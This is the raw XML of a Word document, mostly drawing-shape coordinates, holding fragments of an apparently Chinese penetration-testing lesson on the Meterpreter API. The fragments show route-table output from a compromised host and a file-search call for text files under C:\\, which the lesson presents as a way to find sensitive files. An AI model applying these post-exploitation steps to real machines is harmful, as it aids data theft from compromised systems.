2095,1644,2095,1642,2095,1640,2095,1639,2095,1637,2095,1635,2095,1633,2095,1631,2095,1629,2095,1627,2095,1625,2095,1623,2095,1621,2095,1618,2095,1616,2095,1613,2095,1611,2095,1608,2095,1606,2095,1603,2095,1600,2095,1597,2095,1594,2095,1591,2095,1588,2095,1585,2095,1582,2095,1579,2095,1575,2095,1572,2095,1568,2095,1564,2095,1561,2095,1557,2095,1553,2095,1549,2095,1545,2095,1541,2095,1537,2095,1532,2095,1528,2095,1523,2095,1519,2095,1514,2095,1509,2095,1505,2095,1500,2095,1495,2095,1489,2095,1484,2095,1479,2095,1473,2095,1468,2095,1462,2095,1456,2095,1451,2095,1445,2095,1439,2095,1432,2095,1426,2095,1420e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:88.500pt;width:12.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,1770" coordsize="250,250">
        <v:shape style="position:absolute;left:1950;top:1770;width:250;height:250" coordorigin="1950,1770" coordsize="250,250" path="m1975,1780l1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1976,1780,1976,1780,1976,1780,1976,1780,1976,1780,1976,1780,1977,1780,1977,1780,1977,1780,1977,1780,1977,1780,1978,1780,1978,1780,1978,1780,1979,1780,1979,1780,1980,1780,1980,1780,1981,1780,1981,1780,1982,1780,1982,1780,1983,1780,1983,1780,1984,1780,1985,1780,1986,1780,1986,1780,1987,1780,1988,1780,1989,1780,1990,1780,1991,1780,1992,1780,1993,1780,1994,1780,1995,1780,1996,1780,1997,1780,1999,1780,2000,1780,2001,1780,2003,1780,2004,1780,2006,1780,2007,1780,2009,1780,2011,1780,2012,1780,2014,1780,2016,1780,2018,1780,2020,1780,2022,1780,2024,1780,2026,1780,2028,1780,2030,1780,2033,1780,2035,1780,2038,1780,2040,1780,2043,1780,2045,1780,2048,1780,2051,1780,2054,1780,2056,1780,2059,1780,2063,1780,2066,1780,2069,1780,2072,1780,2075,1780,2079,1780,2082,1780,2086,1780,2090,1780,2093,1780,2097,1780,2101,1780,2105,1780,2109,1780,2113,1780,2117,1780,2122,1780,2126,1780,2131,1780,2135,1780,2140,1780,2145,1780,2150,1780,2154,1780,2160,1780,2165,1780,2170,1780,2175,1780,2181,1780,2186,1780,2192,1780,2197,1780,2203,1780,2209,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1781,2215,1781,2215,1781,2215,1781,2215,1781,2215,1781,2215,1782,2215,1782,2215,1782,2215,1782,2215,1783,2215,1783,2215,1783,2215,1784,2215,1784,2215,1784,2215,1785,2215,1785,2215,1786,2215,1786,2215,1787,2215,1788,2215,1788,2215,1789,2215,1790,2215,1790,2215,1791,2215,1792,2215,1793,2215,1794,2215,1795,2215,1796,2215,1797,2215,1798,2215,1799,2215,1800,2215,1801,2215,1802,2215,1804,2215,1805,2215,1806,2215,1808,2215,1809,2215,1811,2215,1813,2215,1814,2215,1816,2215,1818,2215,1820,2215,1821,2215,1823,2215,1825,2215,1827,2215,1830,2215,1832,2215,1834,2215,1836,2215,1839,2215,1841,2215,1844,2215,1846,2215,1849,2215,1852,2215,1855,2215,1857,2215,1860,2215,1863,2215,1866,2215,1870,2215,1873,2215,1876,2215,1880,2215,1883,2215,1887,2215,1890,2215,1894,2215,1898,2215,1902,2215,1906,2215,1910,2215,1914,2215,1918,2215,1922,2215,1927,2215,1931,2215,1936,2215,1941,2215,1945,2215,1950,2215,1955,2215,1960,2215,1965,2215,1971,2215,1976,2215,1981,2215,1987,2215,1993,2215,1998,2215,2004,2215,2010,2215,2016,2215,2022,2215,2029,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2214,2035,2214,2035,2214,2035,2214,2035,2214,2035,2214,2035,2213,2035,2213,2035,2213,2035,2213,2035,2212,2035,2212,2035,2212,2035,2211,2035,2211,2035,2210,2035,2210,2035,2210,2035,2209,2035,2208,2035,2208,2035,2207,2035,2207,2035,2206,2035,2205,2035,2205,2035,2204,2035,2203,2035,2202,2035,2201,2035,2200,2035,2199,2035,2198,2035,2197,2035,2196,2035,2195,2035,2194,2035,2193,2035,2191,2035,2190,2035,2189,2035,2187,2035,2186,2035,2184,2035,2183,2035,2181,2035,2179,2035,2178,2035,2176,2035,2174,2035,2172,2035,2170,2035,2168,2035,2166,2035,2164,2035,2162,2035,2160,2035,2157,2035,2155,2035,2153,2035,2150,2035,2147,2035,2145,2035,2142,2035,2139,2035,2137,2035,2134,2035,2131,2035,2128,2035,2124,2035,2121,2035,2118,2035,2115,2035,2111,2035,2108,2035,2104,2035,2101,2035,2097,2035,2093,2035,2089,2035,2085,2035,2081,2035,2077,2035,2073,2035,2068,2035,2064,2035,2059,2035,2055,2035,2050,2035,2045,2035,2041,2035,2036,2035,2031,2035,2025,2035,2020,2035,2015,2035,2010,2035,2004,2035,1998,2035,1993,2035,1987,2035,1981,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2034,1975,2034,1975,2034,1975,2034,1975,2034,1975,2034,1975,2033,1975,2033,1975,2033,1975,2033,1975,2032,1975,2032,1975,2032,1975,2031,1975,2031,1975,2031,1975,2030,1975,2030,1975,2029,1975,2029,1975,2028,1975,2027,1975,2027,1975,2026,1975,2025,1975,2025,1975,2024,1975,2023,1975,2022,1975,2021,1975,2020,1975,2019,1975,2018,1975,2017,1975,2016,1975,2015,1975,2014,1975,2012,1975,2011,1975,2010,1975,2008,1975,2007,1975,2005,1975,2004,1975,2002,1975,2001,1975,1999,1975,1997,1975,1995,1975,1993,1975,1991,1975,1989,1975,1987,1975,1985,1975,1983,1975,1981,1975,1979,1975,1976,1975,1974,1975,1971,1975,1969,1975,1966,1975,1963,1975,1960,1975,1958,1975,1955,1975,1952,1975,1948,1975,1945,1975,1942,1975,1939,1975,1935,1975,1932,1975,1928,1975,1925,1975,1921,1975,1917,1975,1913,1975,1909,1975,1905,1975,1901,1975,1897,1975,1893,1975,1888,1975,1884,1975,1879,1975,1874,1975,1870,1975,1865,1975,1860,1975,1855,1975,1850,1975,1844,1975,1839,1975,1834,1975,1828,1975,1822,1975,1817,1975,1811,1975,1805,1975,1799,1975,1793,1975,1786,1975,1780e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:102.500pt;margin-top:106.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2050,2130" coordsize="130,270">
        <v:shape style="position:absolute;left:2050;top:2130;width:130;height:270" coordorigin="2050,2130" coordsize="130,270" path="m2065,2155l2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2066,2155,2066,2155,2066,2155,2066,2155,2066,2155,2066,2155,2066,2155,2066,2155,2066,2155,2067,2155,2067,2155,2067,2155,2067,2155,2067,2155,2068,2155,2068,2155,2068,2155,2068,2155,2069,2155,2069,2155,2069,2155,2070,2155,2070,2155,2070,2155,2071,2155,2071,2155,2072,2155,2072,2155,2072,2155,2073,2155,2073,2155,2074,2155,2074,2155,2075,2155,2076,2155,2076,2155,2077,2155,2078,2155,2078,2155,2079,2155,2080,2155,2080,2155,2081,2155,2082,2155,2083,2155,2084,2155,2085,2155,2086,2155,2086,2155,2087,2155,2088,2155,2089,2155,2091,2155,2092,2155,2093,2155,2094,2155,2095,2155,2096,2155,2098,2155,2099,2155,2100,2155,2102,2155,2103,2155,2104,2155,2106,2155,2107,2155,2109,2155,2110,2155,2112,2155,2114,2155,2115,2155,2117,2155,2119,2155,2121,2155,2122,2155,2124,2155,2126,2155,2128,2155,2130,2155,2132,2155,2134,2155,2136,2155,2138,2155,2141,2155,2143,2155,2145,2155,2148,2155,2150,2155,2152,2155,2155,2155,2157,2155,2160,2155,2162,2155,2165,2155,2168,2155,2171,2155,2173,2155,2176,2155,2179,2155,2182,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2156,2185,2156,2185,2156,2185,2156,2185,2156,2185,2156,2185,2156,2185,2157,2185,2157,2185,2157,2185,2157,2185,2158,2185,2158,2185,2158,2185,2159,2185,2159,2185,2160,2185,2160,2185,2161,2185,2161,2185,2162,2185,2162,2185,2163,2185,2163,2185,2164,2185,2165,2185,2166,2185,2166,2185,2167,2185,2168,2185,2169,2185,2170,2185,2171,2185,2172,2185,2173,2185,2174,2185,2175,2185,2176,2185,2178,2185,2179,2185,2180,2185,2182,2185,2183,2185,2185,2185,2186,2185,2188,2185,2189,2185,2191,2185,2193,2185,2195,2185,2197,2185,2199,2185,2201,2185,2203,2185,2205,2185,2207,2185,2209,2185,2212,2185,2214,2185,2216,2185,2219,2185,2222,2185,2224,2185,2227,2185,2230,2185,2233,2185,2236,2185,2239,2185,2242,2185,2245,2185,2248,2185,2251,2185,2255,2185,2258,2185,2262,2185,2265,2185,2269,2185,2273,2185,2277,2185,2281,2185,2285,2185,2289,2185,2293,2185,2298,2185,2302,2185,2306,2185,2311,2185,2316,2185,2321,2185,2325,2185,2330,2185,2335,2185,2341,2185,2346,2185,2351,2185,2357,2185,2362,2185,2368,2185,2374,2185,2379,2185,2385,2185,2391,2185,2398,2185,2404,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2184,2410,2184,2410,2184,2410,2184,2410,2184,2410,2184,2410,2184,2410,2184,2410,2183,2410,2183,2410,2183,2410,2183,2410,2183,2410,2182,2410,2182,2410,2182,2410,2181,2410,2181,2410,2181,2410,2181,2410,2180,2410,2180,2410,2179,2410,2179,2410,2179,2410,2178,2410,2178,2410,2177,2410,2177,2410,2176,2410,2176,2410,2175,2410,2174,2410,2174,2410,2173,2410,2173,2410,2172,2410,2171,2410,2170,2410,2170,2410,2169,2410,2168,2410,2167,2410,2166,2410,2166,2410,2165,2410,2164,2410,2163,2410,2162,2410,2161,2410,2160,2410,2159,2410,2157,2410,2156,2410,2155,2410,2154,2410,2153,2410,2151,2410,2150,2410,2149,2410,2147,2410,2146,2410,2144,2410,2143,2410,2141,2410,2140,2410,2138,2410,2137,2410,2135,2410,2133,2410,2131,2410,2130,2410,2128,2410,2126,2410,2124,2410,2122,2410,2120,2410,2118,2410,2116,2410,2114,2410,2112,2410,2109,2410,2107,2410,2105,2410,2103,2410,2100,2410,2098,2410,2095,2410,2093,2410,2090,2410,2088,2410,2085,2410,2082,2410,2080,2410,2077,2410,2074,2410,2071,2410,2068,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2409,2065,2409,2065,2409,2065,2409,2065,2409,2065,2409,2065,2408,2065,2408,2065,2408,2065,2408,2065,2407,2065,2407,2065,2407,2065,2406,2065,2406,2065,2405,2065,2405,2065,2404,2065,2404,2065,2403,2065,2403,2065,2402,2065,2401,2065,2401,2065,2400,2065,2399,2065,2398,2065,2397,2065,2396,2065,2395,2065,2394,2065,2393,2065,2392,2065,2391,2065,2390,2065,2389,2065,2388,2065,2386,2065,2385,2065,2384,2065,2382,2065,2381,2065,2379,2065,2378,2065,2376,2065,2374,2065,2372,2065,2371,2065,2369,2065,2367,2065,2365,2065,2363,2065,2360,2065,2358,2065,2356,2065,2354,2065,2351,2065,2349,2065,2346,2065,2344,2065,2341,2065,2338,2065,2336,2065,2333,2065,2330,2065,2327,2065,2324,2065,2320,2065,2317,2065,2314,2065,2311,2065,2307,2065,2303,2065,2300,2065,2296,2065,2292,2065,2288,2065,2284,2065,2280,2065,2276,2065,2272,2065,2268,2065,2263,2065,2259,2065,2254,2065,2250,2065,2245,2065,2240,2065,2235,2065,2230,2065,2225,2065,2219,2065,2214,2065,2209,2065,2203,2065,2198,2065,2192,2065,2186,2065,2180,2065,2174,2065,2168,2065,2161,2065,2155e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:106.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,2130" coordsize="130,270">
        <v:shape style="position:absolute;left:2170;top:2130;width:130;height:270" coordorigin="2170,2130" coordsize="130,270" path="m2185,2155l2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2186,2155,2186,2155,2186,2155,2186,2155,2186,2155,2186,2155,2186,2155,2186,2155,2186,2155,2187,2155,2187,2155,2187,2155,2187,2155,2187,2155,2187,2155,2188,2155,2188,2155,2188,2155,2188,2155,2189,2155,2189,2155,2189,2155,2190,2155,2190,2155,2190,2155,2191,2155,2191,2155,2192,2155,2192,2155,2192,2155,2193,2155,2193,2155,2194,2155,2195,2155,2195,2155,2196,2155,2196,2155,2197,2155,2198,2155,2198,2155,2199,2155,2200,2155,2200,2155,2201,2155,2202,2155,2203,2155,2204,2155,2205,2155,2206,2155,2207,2155,2208,2155,2209,2155,2210,2155,2211,2155,2212,2155,2213,2155,2214,2155,2215,2155,2216,2155,2218,2155,2219,2155,2220,2155,2222,2155,2223,2155,2224,2155,2226,2155,2227,2155,2229,2155,2230,2155,2232,2155,2234,2155,2235,2155,2237,2155,2239,2155,2241,2155,2242,2155,2244,2155,2246,2155,2248,2155,2250,2155,2252,2155,2254,2155,2256,2155,2259,2155,2261,2155,2263,2155,2265,2155,2268,2155,2270,2155,2272,2155,2275,2155,2277,2155,2280,2155,2283,2155,2285,2155,2288,2155,2291,2155,2293,2155,2296,2155,2299,2155,2302,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2156,2305,2156,2305,2156,2305,2156,2305,2156,2305,2156,2305,2156,2305,2157,2305,2157,2305,2157,2305,2157,2305,2158,2305,2158,2305,2158,2305,2159,2305,2159,2305,2160,2305,2160,2305,2161,2305,2161,2305,2162,2305,2162,2305,2163,2305,2163,2305,2164,2305,2165,2305,2166,2305,2166,2305,2167,2305,2168,2305,2169,2305,2170,2305,2171,2305,2172,2305,2173,2305,2174,2305,2175,2305,2176,2305,2178,2305,2179,2305,2180,2305,2182,2305,2183,2305,2185,2305,2186,2305,2188,2305,2189,2305,2191,2305,2193,2305,2195,2305,2197,2305,2199,2305,2201,2305,2203,2305,2205,2305,2207,2305,2209,2305,2212,2305,2214,2305,2216,2305,2219,2305,2222,2305,2224,2305,2227,2305,2230,2305,2233,2305,2236,2305,2239,2305,2242,2305,2245,2305,2248,2305,2251,2305,2255,2305,2258,2305,2262,2305,2265,2305,2269,2305,2273,2305,2277,2305,2281,2305,2285,2305,2289,2305,2293,2305,2298,2305,2302,2305,2306,2305,2311,2305,2316,2305,2321,2305,2325,2305,2330,2305,2335,2305,2341,2305,2346,2305,2351,2305,2357,2305,2362,2305,2368,2305,2374,2305,2379,2305,2385,2305,2391,2305,2398,2305,2404,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2304,2410,2304,2410,2304,2410,2304,2410,2304,2410,2304,2410,2304,2410,2303,2410,2303,2410,2303,2410,2303,2410,2303,2410,2302,2410,2302,2410,2302,2410,2302,2410,2301,2410,2301,2410,2301,2410,2300,2410,2300,2410,2299,2410,2299,2410,2299,2410,2298,2410,2298,2410,2297,2410,2297,2410,2296,2410,2296,2410,2295,2410,2295,2410,2294,2410,2293,2410,2293,2410,2292,2410,2291,2410,2291,2410,2290,2410,2289,2410,2288,2410,2287,2410,2286,2410,2286,2410,2285,2410,2284,2410,2283,2410,2282,2410,2281,2410,2280,2410,2279,2410,2277,2410,2276,2410,2275,2410,2274,2410,2273,2410,2271,2410,2270,2410,2269,2410,2267,2410,2266,2410,2264,2410,2263,2410,2261,2410,2260,2410,2258,2410,2257,2410,2255,2410,2253,2410,2251,2410,2250,2410,2248,2410,2246,2410,2244,2410,2242,2410,2240,2410,2238,2410,2236,2410,2234,2410,2232,2410,2230,2410,2227,2410,2225,2410,2223,2410,2220,2410,2218,2410,2215,2410,2213,2410,2210,2410,2208,2410,2205,2410,2202,2410,2200,2410,2197,2410,2194,2410,2191,2410,2188,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2409,2185,2409,2185,2409,2185,2409,2185,2409,2185,2409,2185,2408,2185,2408,2185,2408,2185,2408,2185,2407,2185,2407,2185,2407,2185,2406,2185,2406,2185,2405,2185,2405,2185,2404,2185,2404,2185,2403,2185,2403,2185,2402,2185,2401,2185,2401,2185,2400,2185,2399,2185,2398,2185,2397,2185,2396,2185,2395,2185,2394,2185,2393,2185,2392,2185,2391,2185,2390,2185,2389,2185,2388,2185,2386,2185,2385,2185,2384,2185,2382,2185,2381,2185,2379,2185,2378,2185,2376,2185,2374,2185,2372,2185,2371,2185,2369,2185,2367,2185,2365,2185,2363,2185,2360,2185,2358,2185,2356,2185,2354,2185,2351,2185,2349,2185,2346,2185,2344,2185,2341,2185,2338,2185,2336,2185,2333,2185,2330,2185,2327,2185,2324,2185,2320,2185,2317,2185,2314,2185,2311,2185,2307,2185,2303,2185,2300,2185,2296,2185,2292,2185,2288,2185,2284,2185,2280,2185,2276,2185,2272,2185,2268,2185,2263,2185,2259,2185,2254,2185,2250,2185,2245,2185,2240,2185,2235,2185,2230,2185,2225,2185,2219,2185,2214,2185,2209,2185,2203,2185,2198,2185,2192,2185,2186,2185,2180,2185,2174,2185,2168,2185,2161,2185,2155e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:390.600pt;width:467.400pt;height:139.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId28" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:632.400pt;width:467.400pt;height:156.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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config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arp_table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interface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11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"65539"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config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routes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129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23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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055a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ee789be58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@subnet="0.0.0.0",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@netmask="0.0.0.0",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@gateway="192.168.1.1",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@interface="65539",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@metric=10&gt;,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#&lt;Rex::Post::Meterpreter::Extensions::St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dapi::Net::Route:0x000055aee789a7b0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@subnet="127.0.0.0",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@netmask="255.0.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0.0",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@gateway="127.0.0.1",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@interface="1",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@metric=1&gt;,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#&lt;Rex::Post::Mete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rpreter::Extensions::Stdapi::Net::Route:0x000055aee78993b0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@subnet="192.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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68.1.0",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@netmask="255.255.255.0",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@gateway="192.168.1.119",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@interface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="65539",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@metric=10&gt;,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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Ne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t::Route:0x000055aee786fec0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@subnet="192.168.1.119",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@netmask="255.255.25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5.255",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@gateway="127.0.0.1",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@interface="1",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@metric=10&gt;,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#&lt;Rex::Post::M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eterpreter::Extensions::Stdapi::Net::Route:0x000055aee786e9d0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@subnet="19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2.168.1.255",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@netmask="255.255.255.255",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@gateway="192.168.1.119",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@inte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rface="65539",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@metric=10&gt;,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#&lt;Rex::Post::Meterpreter::Extensions::Stdap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i::Net::Route:0x000055aee786d698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@subnet="224.0.0.0",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@netmask="240.0.0.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0",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@gateway="192.168.1.119",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@interface="65539",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@metric=10&gt;,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#&lt;Rex::Pos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t::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee785be98</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@subnet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="255.255.255.255",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@netmask="255.255.255.255",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@gateway="192.168.1.119",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@interface="65539",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@metric=1&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79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6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实战中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的敏感文件操作，也是目前最稳定，速度最快的方式：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file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search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"C:\\"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"*.txt"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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="31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更多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的敏感文件操作，后续补充。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163.199pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId3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更多相关的api操作在未来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>课时中介绍。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	<Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/26.jpeg" />
	<Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/27.jpeg" />
	<Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/28.jpeg" />
	<Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/29.jpeg" />
	<Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/30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